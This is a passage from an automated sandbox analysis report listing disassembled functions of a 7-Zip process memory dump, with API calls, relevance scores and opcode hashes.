                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmovewcscmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3584677832-0
                                                                                                                                                                                                • Opcode ID: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                • Instruction ID: 32ce97d644abcb5c2ccabfb377bae2f5177df90798f8c41915e2428aa964cf10
                                                                                                                                                                                                • Opcode Fuzzy Hash: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6841F922304A8091CA10EF26E84066FB769F7C5BE8F955111FF6D47769DF79C886C700
                                                                                                                                                                                                Function 00982ECC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 00982F7E
                                                                                                                                                                                                • fputs.MSVCRT ref: 00982F9D
                                                                                                                                                                                                • free.MSVCRT ref: 00982FB6
                                                                                                                                                                                                • free.MSVCRT ref: 00982FC1
                                                                                                                                                                                                  • Part of subcall function 00942C78: free.MSVCRT ref: 00942CAE
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 0094237E
                                                                                                                                                                                                  • Part of subcall function 00942320: fputs.MSVCRT ref: 009423B8
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 009423C4
                                                                                                                                                                                                • free.MSVCRT ref: 00982FCC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$fputs
                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                • API String ID: 2444650769-2525689732
                                                                                                                                                                                                • Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                • Instruction ID: 0a2588a4d43b42a93a3d0e30d26cfb23ad352fccc56799859531647f99971255
                                                                                                                                                                                                • Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E218D6321994095CA20EF25E89176EA730FBD6BE4F845222FF5E43779DF28C985C700
                                                                                                                                                                                                Function 0098E16E Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                • Instruction ID: 25a3a96e09974751e53431d71e4230048d718e8bed687726b715c4d0883d4176
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                • Instruction Fuzzy Hash: D1318272214B41CAEB40EF24E8A435A7771F7857A4F509236E6AA437B6DF3CC844CB00
                                                                                                                                                                                                Function 0098E1A6 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                • Instruction ID: 2e0dde69cd119187bec2fa94a8439ccd300c3587cfaddd271e1a1fc5a4db738a
                                                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 40214F72214B41C6EB00EF28F86430A7371F7867A4F509226EAAA477B6DF3CC845CB40
                                                                                                                                                                                                Function 0098E139 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                • Instruction ID: 2e0dde69cd119187bec2fa94a8439ccd300c3587cfaddd271e1a1fc5a4db738a
                                                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 40214F72214B41C6EB00EF28F86430A7371F7867A4F509226EAAA477B6DF3CC845CB40
                                                                                                                                                                                                Function 0098E15A Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                • Instruction ID: 2e0dde69cd119187bec2fa94a8439ccd300c3587cfaddd271e1a1fc5a4db738a
                                                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 40214F72214B41C6EB00EF28F86430A7371F7867A4F509226EAAA477B6DF3CC845CB40
                                                                                                                                                                                                Function 00964610 Relevance: 8.8, APIs: 7, Instructions: 62COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                • Instruction ID: f53b9ebc4c675acde74c128d4ee065a2bd8d850e0fb90bc274f9d8306f529a10
                                                                                                                                                                                                • Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                • Instruction Fuzzy Hash: 77115123745A8496CA28BF72D9516293364FF97BB07584231EF3D17B95DF24C8A28300
                                                                                                                                                                                                Function 0096419C Relevance: 8.8, APIs: 7, Instructions: 45COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                • Instruction ID: 1e6fb19e37165778f2514dcb08c903a175e953cb948697456230fed36300d3aa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                • Instruction Fuzzy Hash: CA11C522316A8085CF18EF76C8A172C7360FFC5F99B544662AF7E4B765CF24C8868344
                                                                                                                                                                                                Function 00973A42 Relevance: 7.7, APIs: 6, Instructions: 151COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                • Instruction ID: 3eefa69b53a056448ab736d391777cf6af3e264144105f08a62029288c6d4b97
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                • Instruction Fuzzy Hash: E8512863201A4491CB10EF35D4917AE6761FBD9BC8F948122EE4E97729DF78CA8AC341
                                                                                                                                                                                                Function 00981544 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 009815D5
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$memset
                                                                                                                                                                                                • String ID: Extracting archive: $Open$Testing archive:
                                                                                                                                                                                                • API String ID: 3543874852-295398807
                                                                                                                                                                                                • Opcode ID: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
                                                                                                                                                                                                • Instruction ID: 118facfc45fcaa68986f3f8573723c47069bdfa9790c45ee1c49666b9aee7fd6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4511916234268284DF55EF29D894BEC2368E785F9CF5C8436AE0D4A365EF38C48BC310
                                                                                                                                                                                                Function 00982E24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 00982E47
                                                                                                                                                                                                • fputs.MSVCRT ref: 00982E57
                                                                                                                                                                                                • free.MSVCRT ref: 00982EA4
                                                                                                                                                                                                  • Part of subcall function 00982CFC: fputs.MSVCRT ref: 00982D41
                                                                                                                                                                                                  • Part of subcall function 00982CFC: fputs.MSVCRT ref: 00982DCF
                                                                                                                                                                                                  • Part of subcall function 00982CFC: free.MSVCRT ref: 00982DFF
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                • API String ID: 3873070119-2525689732
                                                                                                                                                                                                • Opcode ID: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
                                                                                                                                                                                                • Instruction ID: 43a24403e451ff5c6ac62d50dca1f5f0597cf7776cedfe084fe1300a29c76e6f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F036A230594051DE20EB26E95577E5321ABDAFF4F449321BD6E0BBA9DF2CC946C700
                                                                                                                                                                                                Function 009749B0 Relevance: 6.4, APIs: 5, Instructions: 106COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 00974A5C
                                                                                                                                                                                                • free.MSVCRT ref: 00974A67
                                                                                                                                                                                                • free.MSVCRT ref: 00974AE4
                                                                                                                                                                                                  • Part of subcall function 00943314: memmove.MSVCRT ref: 00943339
                                                                                                                                                                                                • free.MSVCRT ref: 00974B0F
                                                                                                                                                                                                • free.MSVCRT ref: 00974B1A
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3352498445-0
                                                                                                                                                                                                • Opcode ID: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                • Instruction ID: fb99f647438f5c8d52cc154a5757b3f4c6e23f9101847fcea286f8bd1d9cab71
                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 36418D23245A8491CB14EF25D8507AE67A4FBCAB84F885132EB8E47729DF38C595C714
                                                                                                                                                                                                Function 0098E120 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                • Instruction ID: 2e8abd2c5013ef6c891037ec4db8a0c89156f7270646d6923db8de07cccb4f91
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                • Instruction Fuzzy Hash: 25312E72214B41C6EB10EF28F8A475A7771F385BA4F509226E6A9437B6DF3CD885CB40
                                                                                                                                                                                                Function 00942320 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$fputsmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4106585527-0
                                                                                                                                                                                                • Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                • Instruction ID: 8a85555aace2472d15ce0a4a275e58fe49dfeeb11f926375cabfbcd5391f29ad
                                                                                                                                                                                                • Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                • Instruction Fuzzy Hash: A201256330984091DE20AF25E851A5E7721FBDABF4F445321BA6F876F9DE28C686C740
                                                                                                                                                                                                Function 009468A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFilefree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1936811914-0
                                                                                                                                                                                                • Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                • Instruction ID: 1c0d7528139d5e2260608717bf8afc1aa33d9ae3dc9272e25c620128354c8214
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1701F96330864182DA30AF21D590B7E17689BCB7F4F584321AE7D877A5CE78CD879702
                                                                                                                                                                                                Function 00947D4C Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFilefree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1936811914-0
                                                                                                                                                                                                • Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                • Instruction ID: e191a6363706b8d372673a436f60b6ed8493a273b25516c83d5b5ebd29705ae2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A42661864486CA30AB74A9A077D6224AFCA7F4F540320EA79877F9DF14C9868700
                                                                                                                                                                                                Function 00963E14 Relevance: 5.1, APIs: 4, Instructions: 142COMMON
